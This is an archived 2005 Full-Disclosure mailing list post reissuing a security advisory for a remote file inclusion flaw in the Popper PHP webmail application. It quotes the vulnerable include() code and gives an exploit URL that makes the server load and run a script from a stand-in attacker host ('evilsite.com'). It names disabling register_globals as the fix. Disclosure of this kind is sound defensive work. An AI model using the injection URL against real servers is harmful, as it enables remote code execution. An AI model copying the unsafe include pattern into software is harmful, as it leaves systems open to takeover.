NEOHAPSIS - Peace of Mind Through Integrity and Insight

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Full-Disclosure> 2005-06

[Full-disclosure] Popper webmail remote code execution vulnerability - advisory fix

From: Leon Juranic (ljuraniclss.hr)
Date: Mon Jun 06 2005 - 04:51:35 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hi,

This advisory was already released on http://security.lss.hr, but there was a
mistake in advisory page that marked vulnerable PHP line as HTML tag, so it wasn't
visible within web browser. That's why b0iler described it as a false positive
(http://lists.grok.org.uk/pipermail/full-disclosure/2005-June/034408.html).
I apologize for our mistake, here is fixed advisory.

----------------------------------------------------------------------------------

LSS Security Advisory #LSS-2005-06-07
http://security.lss.hr

Title: Popper webmail remote code execution vulnerability
Advisory ID: LSS-2005-06-07
Date: 2005-06-01
Advisory URL: http://security.lss.hr/index.php?page=details&ID=LSS-2005-06-07
Impact: Remote code execution
Risk Level: High
Vulnerability Type: Remote
Vendors Status: 7th March, 2005

==[ Overview

Popper is a webmail application written in PHP which allows users to read
and send their e-mail messages using a web browser.

==[ Vulnerability

Popper is vulnerable to remote code inclusion bug in childwindow.inc.php script
that can be abused to execute arbitrary code.
Vulnerable code in childwindow.inc.php:
--------
..
<?php
                if(file_exists($form.".toolbar.inc.php")) {
                        include($form.".toolbar.inc.php");
                }
?>
..
..
<?php include($form.".form.inc.php");?>
..
--------

To exploit this vulnerability, attacker has to put script like test.form.inc.php
on www.evilsite.com HTTP server, and call url like this:
http://www.vulnsite.com/popper/childwindow.inc.php?form=http://evilsite.com/test
Vulnerability can be exploited only if register_globals in php.ini file is set
to 'on'.

==[ Affected Version

All popper versions including latest 1.41-r2.

==[ Fix

Set register_globals to off.

==[ PoC Exploit

No PoC needed.

==[ Credits

Credits for this vulnerability goes to Leon Juranic <ljuraniclss.hr>.

==[ LSS Security Contact

LSS Security Team,

WWW : http://security.lss.hr
E-mail : securityLSS.hr
Tel : +385 1 6129 775

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]